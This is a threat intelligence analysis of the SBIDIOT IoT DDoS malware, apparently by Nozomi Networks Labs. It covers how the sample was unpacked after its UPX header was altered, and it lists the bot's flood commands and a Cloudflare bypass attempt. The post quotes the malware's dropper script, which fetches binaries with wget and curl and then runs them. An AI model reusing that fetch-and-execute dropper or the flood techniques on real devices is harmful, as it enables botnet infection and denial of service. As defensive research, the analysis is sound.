Threat Intelligence: Analysis of the SBIDIOT IoT Malware

Threat Intelligence: Analysis of the SBIDIOT IoT Malware

There are billions of IoT connections in the world and more than 70 percent of them are in the industrial sector. This is why Nozomi Networks Labs regularly reviews the threat landscape for IoT devices. Recently, a malware sample named SBIDIOT caught our attention. It had a relatively low number of detections on VirusTotal and its commands, in the current form, were not well documented by the cybersecurity community.

We decided to analyze SBIDIOT and uncovered how it communicates with targets and what types of commands it supports. This information helps detect the threat and allows defenders to stop or mitigate it before harmful impacts occur. The main potential impact of DDoS (Distributed Denial of Service) botnets is the generation of excessively high loads on targeted servers, preventing users from accessing services and thus harming normal business operations.

To avoid impacts, early detection is vital. Detection can be done by your security team (see the malware indicators at the end of this article) or by using a network monitoring and threat intelligence solution such as ours.

Analysis of SBIDIOT Malware

Based on our information, at least one way that the malware propagates is by exploiting an RCE vulnerability in ZTE routers. For older versions, we observed a shell script sh downloading and executing binary payloads once delivered to the victim machines by various means:

#!/bin/bashcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/x86; curl -O http:///SBIDIOT/x86;cat x86 >SSH;chmod +x *;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/mips; curl -O http:///SBIDIOT/mips;cat mips >SSH;chmod +x *;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/mpsl; curl -O http:///SBIDIOT/mpsl;cat mpsl >SSH;chmod +x *;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/arm; curl -O http:///SBIDIOT/arm;cat arm >SSH;chmod +x *;./SSH SSH...

The sample e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 is packed with the standard UPX tool, with the UPX header later modified. While the malware remains executable, it is no longer possible to unpack it using the same tool straight away:

$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 File size Ratio Format Name --------- ------ ----- ---- upx: e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: NotPacked Exception: not packed by UPX Unpacked 0 files.

As we can see here, the UPX! signature was replaced with a custom YTS\x99 signature:

Hex dump showing that the “UPX!” string has been replaced.
Hex dump showing that the “UPX!” string has been replaced.

Restoring it back will enable us to unpack the sample using the standard UPX tool:

$ perl -pi -e 's/YTS\x99/UPX!/g' e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 $ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 File size Ratio Format Name --------- ------ ----- ---- 55372 <- 30024 54.22% linux/i386 e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Unpacked 1 file. $ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

The analysis reveals characteristics quite common for this type of threat. There is a strong focus on DDoS with some parts of the code shared with other malware families like Gafgyt.

Given that the sample is statically linked and stripped, which is almost always the case with malware targeting IoT, the next step was to load FLIRT signatures for uClibc to make analysis easier. uClibc is a compact C library commonly used in Linux kernel-based embedded devices, which is also commonly used by IoT malware developers for easy cross-compilation, as popularized with Mirai. FLIRT signatures are essentially a method that reverse engineering tools like IDA use to pattern-match known libraries, which can greatly speed up the analysis process.

A large number of functions are recognized using FLIRT.
A large number of functions are recognized using FLIRT.

Upon execution, the sample attempts to connect to its C2, which in this case is an IP address and port hard-coded into the binary. Although the C2 infrastructure was not operational during the time of the investigation, we were able to force the sample to talk to our own server as its C2. Coupled with some static analysis, this was enough to quickly figure out the protocol and begin interaction.

The function responsible for handling commands compares each command received from C2 with one of the following strings:

  • TCP
  • HTTPSTOMP
  • VSE
  • HEX
  • STD
  • VOX
  • NFO
  • UDP
  • UDPH
  • R6
  • FN
  • OVHKILL
  • NFOKILL
  • STOP
  • Stop
  • stop

Then, based on the results, it performs several validation checks on its arguments before executing the actual command.

Commands Supported by SBIDIOT

TCP

The TCP command asks the bot to send TCP segments destined for a specified host/port combination for a specified interval of time. Additionally, it allows the operator to set a number of optional TCP flags.

Custom TCP flags supported in the TCP command handler.
Custom TCP flags supported in the TCP command handler.

HTTPSTOMP

As arguments, it takes in an HTTP method, a host/port combination, an attack duration and a request count specifying how many times to repeat this operation. If the attack duration and the request count are not exceeded, this function will continue to perform HTTP requests using the settings provided and a randomly selected user-agent string.

Hard-coded list of user-agent strings.
Hard-coded list of user-agent strings.
HTTPSTOMP command handler.
HTTPSTOMP command handler.

Additionally, another function is called to perform HTTP requests to the /cdn-cgi/l/chk_captcha URI of a hostname/port combo with, once again, a configurable attack duration and request count. This is done in an attempt to circumvent CloudFlare protection mechanisms.

VSE

Another command used for DDoS, which, depending on the arguments provided, employs either UDP or RAW sockets. Again, arguments for the target and attack duration can be provided, but additionally, the attacker can specify a pause interval between packets delivered to the target. Variants of Gafgyt and other IoT malware occasionally include a VSE command to target servers running the Valve Source Engine.

Code snippet from VSE command handler implementing pause interval.
Code snippet from VSE command handler implementing pause interval.

VOX

The VOX command takes a host, a port and an attack duration as its arguments and then sends UDP datagrams with one of three randomly selected hard-coded payloads.

Recorded malicious UDP traffic containing hardcoded payloads.
Recorded malicious UDP traffic containing hardcoded payloads.

UDP

The sample sends UDP payloads to a target host specifying the port, the attack duration and the maximum size of the generated payload. The actual size of the payload may be smaller due to the use of the strlen function, which calculates the size by counting bytes up until the first null value.

Command handler validating UDP arguments.
Command handler validating UDP arguments.

HEX / STD / R6 / NFO / FN / OVHKILL / NFOKILL / UDPH

All of the above commands call the same function, which receives a host name, a port and an attack duration, then starts generating UDP traffic with a fixed payload.

Code diagram with several code blocks pointing to the same function.
Code diagram with several code blocks pointing to the same function.

STOP/stop/Stop

This command sends a SIGKILL signal to all process IDs that are currently being tracked, giving the operator the ability to stop any of the process’ children.

STOP command handler.

Threat Intelligence is Needed to Defend Industrial Systems from IoT Malware

As the number of Internet-connected devices increases at a rate of more than 130 percent a year,1 the threat landscape also rapidly evolves. New families of malware and modifications of existing ones emerge regularly. And, regardless of their complexity and sophistication, they all pose a threat.

To defend against threats to IoT devices that could impact production, uptime and possibly safety, automated tools can help. OT/IoT network monitoring paired with regularly updated threat intelligence identifies indicators of compromise and anomalous behavior, giving you the opportunity to act before harm occurs.

Nozomi Networks Labs is committed to providing real-time information on IoT threats as they continue to increase in prevalence and significance for operational technology environments – stay-tuned for ongoing updates.

For indicators of SBIDIOT malware, see the information provided at the end of this page.

References

  1. “The Internet of Things: Consumer, Industrial & Public Services 2020-2024,” Juniper Networks, March 31, 2020.